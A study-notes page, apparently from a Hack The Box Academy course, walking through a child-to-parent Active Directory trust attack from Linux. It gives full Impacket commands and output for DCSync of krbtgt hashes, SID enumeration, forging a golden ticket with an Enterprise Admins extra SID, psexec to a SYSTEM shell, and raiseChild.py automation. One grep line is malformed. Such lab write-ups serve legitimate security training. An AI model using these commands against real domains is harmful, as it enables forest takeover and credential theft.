🐧Attacking Domain Trusts From Linux

Just like with Windows, we can launch similar attacks from Linux.

We start by gathering the following information again

The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain

Performing DCSync with secretsdump.py

Once we have control of the child domain, we can run a DCSync to grab the NTLM hash of the KRBTGT account.

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up...

Performing SID Brute Force using lookupsid.py

We can now try to use SID brute forcing to find the SID of the child domain.

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240

Looking for the Domain SID

We can refine this further by piping it to grep with the "Domain SID" string

grep | "Domain SID"

Grabbing the Domain SID & Attacking to Enterprise Admin's RID

We can rerun the command and grab the domain SID

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Constructing a Golden Ticket using ticketer.py

We can now use ticketer.py to construct a Golden Ticket, this will be valid to access resources in the child domain. This ticket will be saved in a ccache file, which Kerberos can use to hold credentials.

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 tommy

Setting the KRB5CCNAME Env Variable

We make sure to set the ccache file in our env variable

export KRB5CCNAME=hacker.ccache

Getting a SYSTEM shell using Impacket

We should now be able to psexec.py to authenticate to the parents DC, and drop us into a SYSTEM shell

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/tommy@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

C:\Windows\system32> whoami
nt authority\system

Performing the Attack with raiseChild.py

We can also perform the same attack with raiseChiled.py. It can automate escalating from child to parent domain. It will work as follows.

Obtains the SID for the Enterprise Admins group of the parent domain
Retrieves the hash for the KRBTGT account in the child domain
Creates a Golden Ticket
Logs into the parent domain
Retrieves credentials for the Administrator account in the parent domain

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

We should be very careful using "autopwn" scripts during real engagements!

PreviousAttacking Domain Trusts From Windows NextCross-Forest Trust Abuse From Windows

Last updated 1 year ago

hashtagPerforming DCSync with secretsdump.py

hashtagPerforming SID Brute Force using lookupsid.py

hashtagLooking for the Domain SID

hashtagGrabbing the Domain SID & Attacking to Enterprise Admin's RID

hashtagConstructing a Golden Ticket using ticketer.py

hashtagSetting the KRB5CCNAME Env Variable

hashtagGetting a SYSTEM shell using Impacket

hashtagPerforming the Attack with raiseChild.py